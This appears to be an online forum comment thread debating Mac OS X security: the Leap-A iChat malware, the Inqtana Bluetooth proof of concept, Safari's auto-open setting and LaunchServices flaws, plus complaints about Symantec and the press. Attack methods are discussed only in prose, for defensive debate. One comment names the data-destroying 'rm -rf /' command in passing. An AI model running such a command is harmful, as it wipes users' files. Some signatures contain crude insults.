then came Active Desktop, Active X, Active Content, a web browser and an email program that both used a display technology that was designed to download and run software without user intervention. I was horrified. I didn't know exactly what was going to happen, but I expected something nasty. And boy were my expectations fulfilled. Dozens, then hundreds, then thousands of of attacks, and Microsoft didn't back it out! And it's still in there, and still used by spyware and viruses to sneak into people's machines without the user actively doing anything... at the most they may have to click a button on a dialog box that looks pretty much like the ones that come up regularly and have to be clicked away...
The fundamental problem, the thing that makes Windows so terribly attractive to virus writers, is that it's got this big "infect me harder" capability built in to the core of the OS that you can't remove or even fully disable.
This is so much easier than even the weaker versions of the same problem in Safari and Firefox are trivial by comparison. If the UNIX (Linux&OSX) desktop market share was 50% instead of 5% you'd still have orders of magnitude more viruses on Windows than Macs... because it's so much easier a target. Even if you turned off ALL the internal security and ran as "root" with no password, the "Security Zones" hole is so much deeper and harder to close that there's still no contest.
Do you think that everyone else sees the same shades of "only-black" and "only-white" that you see?
There is no such thing as "secure".
Is there such a thing as "more secure" or "less secure"?
Or do you earnestly believe that Windows = OS X = Linux = OpenBSD in terms of security?
Or will you parrot the same argument that marketshare=exploits?
Just curious, I like to understand how the mad man's mind works.
WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
The upper limit of "security" is human stupidity. So you will never be 100% safe.
But you don't have to be.
Viruses, worms and trojans are only a problem when the infection rate is greater than the removal rate.
If machines get cleaned faster than they get infected, the virus, worm or trojan will die.
So the Mac's security model only has to be good enough to slow the infection rate below the removal rate.
You might hear rumours of someone's brother's friend's girlfriend's mother getting a "virus". But the reality is that more data will be lost because of human error than because of viruses, worms or trojans.
And that is the BEST that you can do.
There's a better solution.
.app system means you can fake out people by making a program or shell script look like a JPG or Word document, and there's no good visual que as to what is a document and what is an application.
1. Safari doesn't open ANYTHING executable, period. If it's got executable permissions, it can't be opened.
2. The Finder should implement an icon overlay showing that a file is executable. Like the shortcut arrow on Windows, except some kind of notification that this is not an document, but is a program.
3. The first time the system runs ANY new executable that has not been run before, it pops up a warning window: "Warning! You are trying to run . Please be aware that this is an untrusted program you are running for the first time on your system. If you weren't expecting this dialogue, or thought you were opening a document file, please press Cancel NOW!"
Perhaps not in those words, but something similar.
The main thing is number 2. Worms like this won't happen on Linux, because you have to mark programs as "executable", or you have to run them through your package manager. Plus, icons are specified exclusively by mime-type, not by the thing you download. Apple's
Providing that que will eliminate this hole for 99% of users.
WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
Dupe...No Digg...er sorry wrong site. Still a dupe though.
This isn't about individuals. This is about the population of Mac users.
If it is 99% impossible to get a virus, but some idiot manages to, that idiot will have to find another idiot to pass it on to.
The 99%'s keep adding up. So there's 1% chance of finding the first idiot.
There's only a 0.1% chance of finding the second idiot.
0.01% of finding a third idiot. 0.001% of finding the next, etc.
Meanwhile, there is a 0.001% chance of your hard drive failing. So, mathematically, you will lose data because your harddrive crashed BEFORE you will be infected with a virus.
You're more at risk of losing your data because your house burned down.
Apple had the advantage of seeing what was already happening to Windows when they made their decisions about how OS X would be designed, plus the system it was derived from was pretty robust to begin with.
It's a pity Apple hasn't been paying more attention.
Two years ago, Apple got bit by Safari's blind trust of LaunchServices, at the same time Microsoft got hit by a hole in almost the same application on Windows. Instead of going "oh, maybe Safari shouldn't use the same database for finding helpers as desktop applications do", they went "oh, maybe the helper app database should try and guess if it's being used by an exploit".
That's the same kind of decision Microsoft made in the '90s when they came up with "Active Content" and "Security Zones", and it didn't work for them then. Microsoft isn't likely to back out of that, but, damn, Apple should have noticed what a big blunder that was.
At least they should have backed out of it the first time it came up.
I swear, that if a virus or trojan ever spread like wildfire on Linux boxes (come at me, all you boxen guys), that will truly be the year that Linux taketh over the desktop.
Am I finally gonna have to shell out for an antivirus program for my PowerBook?
I've been holding off so far because there's isn't anything critical on there, and because Macs haven't been hit by any serious viruses. But if I start seeing real, dangerous, honest-to-God in-the-wild viruses that DON'T require me to be an idiot and type in my password to install, the time of innocence is passed.
Of course, Windows computers are still far worse in this regard. But once the "annoyance threshold" of buying/installing an antivirus program is crossed, a big advantage to Mac convenience is lost. And for most Joe Sixpack types, I'd guess that convenience is a bigger concern than security when it comes to viruses and virus-protection.
That got me thinking, what is an antivirus anyways?
So, basically, using an antivirus makes sense if its plugins repository (2) is updated faster than abused softwares are (1).
Given Apple's track record regarding security patches being applied on my machine before even reading about said patches on /. or macrumors, I'd say I'd be hard-pressed to find an antivirus dealer that can roll out patches to Apple's app faster than Apple can. I do think now that the antivirus model does makes sense in the Microsoft world, but doesn't really make sense on a Mac, until Apple stops being proactive (yeah buzzword!) about security fixes.
One exception: a fresh OSX install exposed on the net would be an easy target. Apple should include a post-setup stage where all services are deactivated and the firewall brought up while all security patches are installed (or make the user sign with its own blood a "Don't update this machine, I really know what I may be exposed to and want to test anyway". That would be a tad paranoïac, but...
We love Apple?
We hate Microsoft?
We still love Google, but they are starting to slip a bit?
Linux is bestest ever and ever?
RIAA and MPAA sux it?
Safari doesn't open ANYTHING executable, period.
That's half of a solution, but it would still leave the original hole open.
The Finder should implement an icon overlay showing that a file is executable.
That would be useful, but it would still leave the original hole open.
The first time the system runs ANY new executable that has not been run before, it pops up a warning window [...]
That's a REALLY bad idea, and it would still leave the original security hole open.
NEITHER of the other two demonstrated exploits, using URIs rather than file names, would have been prevented by this approach. In fact the second showed up after Apple implemented pretty much that approach for URIs.
It also would not have prevented this attack, because LaunchServices didn't open the executable... the shell did, and there are variations on this attack that don't require the script used in the attack to be executable.
As to why it's a bad idea... well, Microsoft has been trying to use the same "trying to detect whether an attack is underway at the last minute" approach since 1997. All it's done is teach people that the system comes up with stupid dialogs on a regular basis, so you just gotta approve them and go on if you want to keep working.
I've been supporting 150-400 people on Windows for over a decade now, and I've regularly had people come up to me, the same people... over and over again... telling me that they'd clicked on the wrong button in a dialog box and gotten infected. false positives from these kinds of last-minute checks are always going to be so much more numerous than valid alarms that all you're doing is adding noise to the user experience.
The right solution is to keep the attack at arms length and let the user at his own time make the decision. Popping up a routine and routinely approved dialog isn't giving the user time to do the right thing, it's encouraging a snap decision and that's bad user interface design.
1. Turn off "Open Safe Files After Downloading" by default.
2. Create a separate database of "Safe Applications". ONLY use these from web pages viewed in Safari or any other document from applications that deal with untrusted documents.
3. Don't put any kind of installer, disk image mounter, or archive extractor in that database.
But of these three, #2 is the most important.
Although Apple is largely responsible for causing these security flaws, it is hardly something that can be avoided in a modern consumer oriented OS such as Mac OS X. Despite the fact that it inherits a large chunk of its code base from the relatively mature FreeBSD (as well as being descended from NeXTSTEP), Apple have added a vast amount of entirely new code to the system, purely because of the demands of the consumer, and as a result in terms of a general user experience (as in regular user stuff - no flaimbait intended) I believe that Mac OS X has surpassed the experience currently possible with *BSD/Linux.
However, in doing so it has introduced a vast amount of new code:
-Spotlight
-Aqua
-WebKit
-Quicktime
et al.
All of these add in functionality and usability, but lots of new code means lots of room for error. No human can develop 100% bug free code when introducing new ideas with great speed. (As anyone using a cutting edge Linux kernal knows).
Apple could introduce an OpenBSD style audit (Rumour suggests that they don't even use automated checking for buffer overruns!), but the pace of development would suffer and Apple needs to be competitive with the overal rate of development of Windows if it will have any great success in the consumer market.
This is a natural consequence of rapid development.
If we want new features we will get new bugs and, to be honest, I'm surprised that the overall negative impact of such a strategy hasn't been even greater for Apple. But if there is any time to change their strategy, now is the time.
Nothing sucks like a Vax, nothing blows like a PowerMac G4
So someone downloads a virus, as long as theyre not running as root/admin then they can just del/readd user account... wow, problem solved, unless i missed something here?
Menya zovut Shnur
these new security threats are no more threatening that a paraplegic kitten.
To me, that one is worth more than the rest of the Wired web site. Sadly, to me, Wired seems to be made up of noobs and wannabes that I really don't give them much credit. Their annual "vaporware" artcles use a very narrow definition of vaporware, generally most products they declare to be vapor end up arriving with in a year of such declaration.
Back when the DeCSS program got media notice, Wired posted an article suggesting that we should all give up our DVD drives so Lucas would release his Star Wars Trilogy onto DVD. I think I emailed them a rebuttal of about fifteen factual and logical errors in that one article.
The important news in this slashdot was completely overlooked. We've already heard about the bugs, but here's what's really important: Apple's response to the recent problems:
"Apple takes security very seriously. We're working on a fix so that this doesn't become something that could affect customers. Apple always advises Mac users to only accept files from vendors and Web sites that they know and trust."
If I recall correctly, it took Microsoft 8 days to release a patch for the WMF bug after it was discovered. In those 8 days, many computers were affected, but still, 8 days is impressive. Let's see how long it takes Apple...
Actually, though I still dislike Windows, it is not hard to use good common sense and secure your Windows machine. I had my box behind two firewalls (one software, one hardware), and when I wasn't using the Internet, I turned it off. This box stayed virus free for a full semester. At the end of the semester, I reformatted for spring cleaning, but I'm sure it could have gone longer. I imagine the same could go for MacOS, and definately gopes for *nix.
Want to find other gamers to play board and role playing game
there are OS vulnerabilities and application vulnerabilities.
... you do see apps breaking this rule from time to time) call the shell to run applications... they fork() and exec() the desired application directly... because the shell's behaviour isn't controllable or fully predictable.
And this is an OS vulnerability. On Mac OS X, LaunchServices is an OS component. It's the normal way to launch GUI applications, including helper applications from web browsers, like the shell in UNIX is the normal way to run command line applications. In UNIX, though, applications that have security concerns don't (or shouldn't
LaunchServices has many of the same problems. UNFORTUNATELY, there's no general "safe" way to open documents on OS X. It's possible to securely open applications if you know the right application, but it's more complex than just fork/exec, and you have to deal with the difference between old-style Carbon apps and Cocoa appdirs... so Safari and other programs use LaunchServices.
The lack of a "secure applications only" equivalent to LaunchServices is an OS vulnerability. One that must be fixed (alas, Apple didn't fix it the last two times around).
Symantec speaking baddly of Macs should work for them both ways. Prevent people from switching away from the arch they sell most product for AND frighten Mac users into buying their crap.
They will only be able to demonize Mac's for so long, until people realise that they are harder to exploit on a large scale because they come with less insane defaults.
BTW, if you really REALLY want to fuck up your Mac install... install some Symantec products. A serious downgrade.
War crimes, torture, lies, illegal spying... Would someone give Bush a blowjob, already, so he can be impeached?
before it is found
The point of the grand-parent was that the primary use of the worms/Trojans/virus is for commercial purposes, not diabolical purposes (grand destruction of data accompanied by an evil laugh and stroking of the handle-bar mustache). For the infiltration to succeed, the malware needs to be slow and quiet in its attempt to proliferate. "Send to all" viruses are immediately identifiable by the amount of traffic they generate (e.g. Beagle and variants).
Therefore, the main resource that a zero-day exploit utilizes (stealth and time before patching) are mitigated by the fact that some of the e-mails are sent to dead ends. Processing power, bandwidth, etc. are all incidental as long as they're not limiting.
Think of the electricity usage!
Although Apple is largely responsible for causing these security flaws, it is hardly something that can be avoided in a modern consumer oriented OS such as Mac OS X.
Yes, it bloody well can.
A key part of this attack should have been closed almost two years ago but Apple 'fixed' the wrong thing.
And they knows there's a problem with LaunchServices, because in Tiger they allow you to override the types of files Safari considers "safe"... unfortunately they still use the LaunchServices database which leaves the "injection" problem intact.
So... Apple can fix these problems. Secure approaches are well known, and have been known for longer than Apple has existed as a company, and they know the problems exist. Why do they leave this hole open? I don't know, possibly because Microsoft does?
Please. MACs were NEVER immnue. They were just ignored because only 1% of the populace had them. So welcome to reality - when you are WORTH being a target you will BECOME a target.
How many Mac users today run anti-virus software?
The naive ones.
So far the only actual damage I'm aware of caused by any of these trojan-horse worms on OS X has been caused by antivirus software incorrectly identifying uninfected files as them.
Similarly, the only cases I know of where malware has actually caused data-loss on Palms or Pocket PCs is where anti-virus software itself caused a problem or led to an overreaction after a false positive.
The most effective anti-virus software we've used on Windows has been Netscape. And we've lost more man-hours to problems caused by AV software than to trojan horses that people using Netscape have been convinced to download and open. IE is a different kettle of security holes, of course...
I would have to agree about Symantec software. It is bad for PCs, as well as for Macs, and I don't see it getting better anytime soon.
It is my belief, although I have no proof of this other than the software itself, that Symantec does not employ programmers. They seem to have become a behemoth of a company much like EA Games has become in the video game arena. My guess is that they retain a code base for their products and they pay consulting firms, perhaps located in India and/or China, to implement features and to create the next version. I feel that they have team leaders that come up with possible new features and coordinate tasks with consulting firms, but it seems fairly obvious that they shouldn't be considered a programming company.
I believe the software gets worse and worse with every release. It is a small deal to write a virus scanner, and it should be a simple task to write a virus scanner that runs efficiently. But, instead the program consumes many times for RAM than it should, eats up CPU cycles, has a horrible front-end (and an even worse one for home users), and a complicated support structure. The newest release of Corporate 10 is even worse with the implementation of anti-spyware. It has come to a point that Symantec, even on the PC, is a worse threat than even the malware.
Symantec buys up products from various products and then stamps their name on it. They take control of the project with little understanding of the internals and then it seems they outsource the work for it, which only compounds the problem. Heck, the only product I actually like now is Ghost and that was bought from Binary Research.
And the Norton Internet Security suites are even more evil. The number of times that the NIS has corrupted a computer is beyond counting...
So, from the quality of the work given such a simple concept it should be obvious that Symantec is disjointed and needs major fixing.
I miss the old DOS F-Prot scanner that bulletin board services used because it was small, fast and simple, and it was running on only a handful of MHz. This scanner is now free, and I still use it from time to time, but it is horrible to see how poor software quality has become after all these years.
"The optimist proclaims that we live in the best of all possible worlds, and the pessimist fears this is true." --James
Well, it's been almost two years and Apple's still sitting on the fix for the LaunchServices problems.
But then Microsoft's going for TEN years of not fixing their corresponding (and much more serious and harder to fix) design flaw, so Apple's not doing so bad.
Then a few are found when they are exploited in the wild by hackers.
As far as I know the only exploits in the wild involving OS X have been social engineering attacks... trojan horses convincing people to execute programs. These aren't security holes.
There are a few security holes that Apple has been reluctant to fix, maybe this time they'll be convinced to bite the bullet before someone DOES create an automated worm with them.
True. At the moment, I'm running OS X in a Managed user w/all but Terminal enabled 'just in case' I open a dodgy zip (though the only 'abusive' zips I've opened have been harmless vulnerability proof-of-concept demos).
It's a pain in the bum, a lot of things don't work w/out Terminal: Dashboard's been quirky, the ctrl+command+D dictionary shortcut doesn't work, etc. Plus, no terminal! This is the price I pay for the paranoia Windows has dragged me into over my decades as a Windows user (I only just switched this Jan)
It'd be nice if Apple could come up with something fairly pronto...
http://www.wired.com/news/columns/0,70257-0.html?
http://optimist.sdf-eu.org/ssp/
Take care !
At the moment, I'm running OS X in a Managed user w/all but Terminal enabled 'just in case' I open a dodgy zip
That's silly. If you turn off "Open Safe Files" and switch to something other than BOMArchiver for opening Zip archives then you'll be safe from attacks through other applications that have similar capabilities, AND you won't lose Terminal.
Terminal isn't the problem.
Safari and LaunchServices are the dysfunction siblings that cause the problem. There's not much you can do about LaunchServices, other than avoiding the REAL application that's being exploited (BOMArchiver), but you can keep Safari from hurting you pretty easily.
I'd recommend installing Stuffit Expander but ONLY enable it for "zip", and turn off "Open Safe Files By Default", and quit worrying about the BOM.
The fact that windows is more popular is certainly part of why it has so many security flaws, but no operating system that runs with IPC ports open as default can make claims to be paying any attention to security.
James P. Barrett
Why hack a mac? Nobody does anything useful on them... ...aside from photoshop, and warcraft 3.
Now, that heat will be off of the Microsoft OS's.
It's all part of the 300 year world domination plan that Microsoft has.
Macintosh should have never accepted the 150 Million from Microsoft in 1997.
Maybe, now we will give those holier than thou Macintosh fanatics a piece of humble pie with a nice warm cup of shut the hell up.
While I must admit Apple does make some nice hardware for running Linux.
I love my Linux desktop with an occasional mix of Microsoft office products.
Any virus or trojan has two parts. The first is the route of infiltration, the second is the payload which has the ill effects.
OS vendors can take care of the 1st part, and they already do. In theory, with a perfect OS (and a perfect user), there is no need for an antivirus or antispyware application.
However users aren't perfect, and even with patched machines they double click hotmamas.jpg.exe or britneyspears.jpg.dmg and click yes yes yes... and then it's the job of tools like Symantec to identify and nullify the payloads (a vastly different problem then "securing the borders").
Virus scanners search for undesirable (yet valid) code. OS vendors would be hard pressed to categorize any code as such; they need to stay neutral. But they should at least make sure the OS is robust, so only what the user intends to run is what is actually run in the first place.
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
Actually, yes, I do. I can personally tell you about several Windows installations (up-to-date with updates) with anti-virus software (up-to-date), that were still completely taken down by malware. In fact, the antivirus software was specifically attacked and rendered useless in several of the cases. The users do not make a habit of opening anything that they do not know exactly who it is from.
So, yes, I know that many of the stories that we read about are from users who keep their systems up-to-date and use a bit of common sense. Yet Windows is still compromised.
I can't speak for Linux (too many distros to even begin speaking about all of them). I cannot tell you if OS X will survive a concerted attack like Windows gets. No really knows until it happens (that goes for the supporters and critics equally). But I can tell you that Windows is full of problems even for prudent and prepared people. That much has been proven to me and that is what I tell my clients.
Marketing Guy at Symantec:
"Hey - people are starting to realize that anti-virus software for a Mac is totally worthless because there are no viruses! What do we do?"
Engineer at Symantec:
"Well...let me see - if you download this file, which sorta looks like it could be an image, double click it, and then hit OK twice, you could theoretically install malicious software on your Mac. But from what I know, nobody's ever done that....
Marketing Guy:
"GREAT! I'll let the guy at the WSJ know about the epidemic right away!"
LOL. That's probably close to word-for-word what was said.
Doug and his Doug OS 3.2, yah he doesn't have to worry about viruses or worms and such, no published system flaws, and he doesn't miss an opportunity to rub my face in it for using windows, but sooner or later once he gets past .00001 market share, his day will come, oh yes his day will surely come.. that's when I get to gloat.. mwuahhaha.
"seriously if you have to manually download the program and enter your admin password, it is not a virus or a worm. I dont know why people keep calling it that. It is a Trojan and those have existed since the first rm -rf / script."
From the article:
"Among the concerns: two "worms," programs written by unknown hackers that were designed to spread themselves to other Macs through Apple's iChat instant-messaging software and Bluetooth wireless-communications capability."
Vote for Pedro
I submitted a better article than this yesterday and it was rejected. Symantec still has an unpatched security hole that affects all platforms including OS X, McAfees support of the mac platform has been dubious at best, and last week the hot topic on the macenterprise.org mailing list was that Sophos will generate false positives on the mac platform and quarantine or delete legitimate clean apps. I've installed Clamxav, made sure auto-opening of "safe" files is turned off, made sure unnecessary services are turned off and firewalled, and set a strong password for SSH. Come and get me.
First of all, it should be no surprise that virus protection companies are the ones who are the most vocal about these potential Mac OS X vulnerabilities. Without Mac viruses, they have no product to sell to the increasing numbers of Mac users.
Leap-A (the iChat worm) is essentially an executable disguised as a JPEG image file and requires the potential target user to manually accept the file download and then manually open the executable. Even Symantec classes the malware as a low threat because it doesn't automatically infect other's machines. The company says it has seen less than 50 infected machines.
The second piece of Mac OS X malware, Inqtana.A, is a Java-based "proof of concept" that exploits a vulnerability in the Bluetooth implementation in versions of Mac OS X that haven't been updated with security patches (specifically, Mac OS X 10.4.0). Inqtana.A exploits a vulnerability whereby it causes the affected machine to automatically send an Object Exchange (OBEX) Push request to any other system listening over Bluetooth. To spread, the targetted user must manually accept the data transfer. Again, this threat does not automatically infect other's machines.
Additionally, this potential Bluetooth exploit was actually documented way back in May 2005 and Apple issued a security update in June 2005 that closed the hole (Apple Security Update 2005-006). Apple also integrated that security change into all versions of Mac OS X starting with v10.4.1.
The worms that have made headline news, and now seem almost commonplace for Windows users, are the ones that spread without any user interaction due to the poor default configuration and automatic code execution of Windows -- they can infect millions of machines on the internet in hours.
The only relevant part of the article comes at the very end:
"Many viruses and worms, for instance, don't exploit security holes in operating systems. Instead, they use what are called ''social engineering'' techniques to trick users into doing things that they shouldn't do, like unwittingly installing programs."
"Rather than weaknesses in operating systems, such approaches exploit ''a bug in peoples' brains, which is much harder to patch,'' Mr. Cluley says."
Leander Kahney of Wired echos exactly my sentiments on these events:
http://www.wired.com/news/columns/0,70257-0.html?t w=wn_index_25
By the way, the Safari vulnerability talked about in the above Wired article can be attributed to poor program defaults (along with poorly tested code for backwards-compatibility to Mac OS 9) and can be completely avoided by disabling the "Open safe files after downloading" preference in Safari. Keep in mind that Safari is just an application program which runs on Mac OS X and is not integrated into it in the way that Internet Explorer is integrated into Windows. Even if this vulnerability could not mitigated by a simple preference toggle, you could just uninstall Safari (a matter of simply dragging its icon into the trash) and install a different web browser in its
stead (such as Mozilla Firefox). That's something you just can't do with Internet Explorer or other parts of Windows.
And in response to all the smug Windows apologists who think these recent developments prove that no operating system is truly safer than another and the number of exploits for an operating system are directly proportional to market share, I have this to say:
There were approximately 16,000 new viruses that targetted Windows XP in 2005. There have been 2, count them, 2 pieces of malware that targetted Mac OS X since 2001 (when Mac OS X was originally released). Taking market share into account (Windows XP at roughly 80% and Mac OS X at roughly 4%), we can extrapolate that there should have been 20,000 new viruses across all operating systems in the last 12 months (16,000 / 80%). At this rate, Mac OS X should have had 800 new viruses in the last 12 mo
Schrödinger's cat is not amused—maybe.
"False logic. That is like saying that if tanks were more popular they would be less secure than than light armored vehicles"
If MacOS is so secure, why do they keep releasing security updates? How often have linux web servers been defaced? I don't think unix variants are as secure as you think they are.
Vote for Pedro
Can anyone cite any information on these alleged mac worms?
All this is sensible.. but so far nobody has shown an actual worm or virus in the wild that targets OS X.
So far this sounds like pure conjecture.
Firstly, I note that it was the Wall Street Journal that lead the way in saying the Apple was doomed. This was pre-Jobs and was when their stock was selling for about $14 per share. I bought Apple stock that year.
I made my purchase thinking that the sale of the technology in the company, assuming a bankruptcy, would cover a $14 share price. The industrial design was what saved it.
Now Jobs is back. The WSJ is hacked because their bets didn't pay off.
So they go searching for a bedfellow -- let's see, someone like Symantec who hasn't been able to made any good code at all for Apple Macintosh computers since the dawn of OS X to analyze their system
Now this is probably the hallmark of the WSJ's reporting on Apple: "Let's get someone who absolutely cannot understand's Apple's operating system to comment on it. Then, let's publish what they say as if they actually had standing in the Mac community like they still do in the pee cee community and see if we can confuse the issue even more."
Better yet: "Let's go out and rewrite and publish a press release put out by that company as if it were our own story (which is much of what you read about companies in the WSJ) without checking up on their bona-fides. After all, we need filler because our ad people have just sold another three or four more pages of ads and we're running out of copy."
There has been one incident of malware noted in the wild that ran on Apple's OS X (assuming you discount Sony's DRM scam) and it warned you. Since Windoze XP has come out, how many incidents of malware have been noted?
Apple's OS isn't absolutely impregnable -- hardly anything is -- but that does not give Symantec or the Wall Street Urinal (sic.) license to fabricate.
Gods don't kill people, people with gods kill people.
Steps to understanding a mad man....
1) Take notes the next time you think
2) Take said notes (if legible) to head doctor for translation
3) REPEAT until understood.
Yes, this could be considered an infinate loop, but that's not my problem...
No kidding.
A virus is like the "cold" you catch because you didn't wear enough layers and the low body temperature made your immune system weak.
Or the random virus circulating the Interweb that infiltrated an exploit in your program/OS because you didn't get the latest patches.
On the other hand, this is more like...
Someone giving you a handgun and telling you it's a can of whipped cream. You put it to your mouth, pull the trigger, and blow a chunk of your cheek off.
Or someone giving you a file, telling you it's a program illustrating Lindsey Lohan clad in whipped cream. You put it in your computer, type in your root password, install it, and blow a chunk of your OS off.
- shazow
2.) Nobody said that a user couldn't make a system insecure. I can install a telnet server on my computer with a administrator logon with no password. This would be idiotic and extremely insecure but it isn't the fault of the OS and therefore is NOT relevant in anyway to this discussion.
It is true that there ARE no secure OSs at the moment. Since no OS has been completely and utterly designed with only security in mind (Reference: the secure box is the unplugged box joke). No one has proven that the concept is not possible however, and I challenge you to come up with a proof. For example: I'm pretty sure that it would be a fairly simple task to create an OS to run just a network driver and a monitor that would connect to the internet and download static web pages only that would have no security bugs whatsoever. Now that would be pretty useless but your premise that "THERE IS NO SUCH THING AS A SECURE OS" is in theory (though currently not in practice) ridiculous.
All these dumb media outlests that dont understand what they are reporting. None of these latest attempts at the Apple OS security are a major threat. People are just envious of Apples current fan fare. I am surprise the article didnt predict Apple going out of business like they have for the last 20 years.
Cool. Saves me the trouble of reaching for the power button myelf. Not that I ever turn it off, for that matter.
Duct tape is like the Force. It has a light side, a dark side, and it holds the universe together.
Do they mean turn on as in power on, or do they mean Macs get hot & bothered by worms?
https://www.eff.org/https-everywhere
You sir, are an idiot. Almost all DOS viruses and most Windows viruses require you to manually execute the infected program to spread it. So I guess 99% of what has been called 'viruses' are just trojans, according to your "expert" opinion. Remember the Melissa virus? That required you to manually run the e-mail attachment. These kinds of viruses are VERY COMMMON.
1. Please find me a reputable definition of a virus that says it can't require you to enter a password.
2. Please find me a reputable definition of a virus that says you can't manually run it.
Virus: A program that infects other programs in order to spread.
Worm: A program that spreads itself over an internet connection. Some definitions require it to directly open an internet connection (use sockets) rather than piggy backing on some other service.
Trojan: Malicious program disguised as a legitimate one. Does not spread.
In the case of the recent OS X malware, it was both a worm and a virus. It attempts to infect local executables. It also attempts to send itself via iChat.
I wish Apple apologists doing damage control after a bonafide virus/worm has shown up for their platform. Just admit your error. Please, mod the other posts down into oblivion. I'm sick of them saying that "it's not a virus" when it fits the DE FACTO standard definitions that hackers, security experts and virus writers use.
Hackers are supposed to be good people, people who are masters of their domain and are willing to help out others. But unfortunately, the media (both print and online) almost always seems to tag the term hackers to someone who breaks into other people's computers. Atleast, on websites like Slashdot, I expected to people to understand the meaning of 'Hackers' and 'Crackers'
Perhaps just dealing with INTEL is enough to ruin everything. Its too bad MAC has such problems navigating about & performing chores in first place. NEVER FORGET:"MAC IS CRAP".Signed:PHYSICIAN THOMAS STEWART VON DRASHEK M.D.
WINDOWS XP Service Pack -X- 396 mb. http://www.geocities.com/tsvondrashekmd/WASHINGTO
To be honest, I saw it coming... the sleek designs, the cute sounds, that sly come-hither stare. So "worms" (ahem) turn on Macs... that's their decision and they should be proud of it :)
Did you see the pool? They flipped the bitch!
Now that you mention it, I find this thread shallow and pedantic.
That would require the OS vendor to have, on file, a list of every binary of every version of piece of software anyone would care to run on the system. (Viruses patch programs, so simple checksums don't really help you there). The most you could do is identify specific pieces of stand-alone malware, which is dwarfed by many other types of attacks.
This is an essentially impossible task, and it would suck for developers. It also puts the burden on the OS vendor to decide good vs. bad software. It's a sometimes arbitrary decision that is best serviced by having multiple competing vendors for a end-user to choose from (one that protects a user from softwares most out-of-line with that users' interests). The OS vendor could also abuse this position to reduce competition (not promptly signing or labeling software it doesn't like as "bad").
Yeah, so no. I think the current state-of-the-art (code fingerprinting and multiple vendors) is probably a more scalable, less big-brotherish solution.
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
isn't this last week's news? didn't this discussion already happen? Anybody who's used Macs for a long period of time knows that they aren't 'safe.' But they are a HELL of a lot saf-er. amazing. it used to be 'Macs have no viruses because nobody uses them.' Now that it's widely agreed that they're pretty great and Xp is a royal pain to secure, it's 'see, I told you Macs aren't any better.' YES THEY ARE! and yes I use both.
As I predicted, Apple has merely patched the current incarnation of this flaw. It hasn't changed the flawed model of treating files as "safe".
As I noted the last time, there will be future exploits of this type until Apple takes the simple step of establishing a parallel registry of trusted programs, rather than trying (in vain) to echieve a balance between convenience and security using a single list of helpers and URI handlers for both local and untrusted content.
Ironically, the fix in 10.3.9 (do not open the content) is better than the fix in 10.4.5 (warn the user about the content).
Which security software company do you work for? Are you the author of the Leap exploit?
Jesus was a compassionate social conservative who called individuals to sin no more.
If I was working for an antivirus company I'd be happy Apple was starting to go down the Microsoft path, where there's so many security holes in the OS that the whole fundamentally broken approach of "antivirus" software is the only way to stay secure.
Automatic opening of untrusted content is a VERY dangerous operation, and if it is to be implemented at all it MUST be implemented using an interface that's dedicated to the execution of trusted handlers for that content.
Using LaunchServices or Windows Explorer when starting applications to open attachments or downloaded files is like passing CGI variables to programs using system(). The requirements for an API that's used by local applications to open local content are fundamentally different from those for an API used by applications handling untrusted content. Instead of trying to make sure that every local application is crippled and bound about with warnings and alerts, they should be implementing a locked down interface just for browsers, mail software, and so on...
an apple a day keeps the doctor (symantec) away.
i agree
Glad for the PR. I have a relative with an Apple and she had no idea how to check or protect her system. I think it's about time all Apple users take the initiative to protect their system and keep their anti-virus software up-to-date (and install it first!).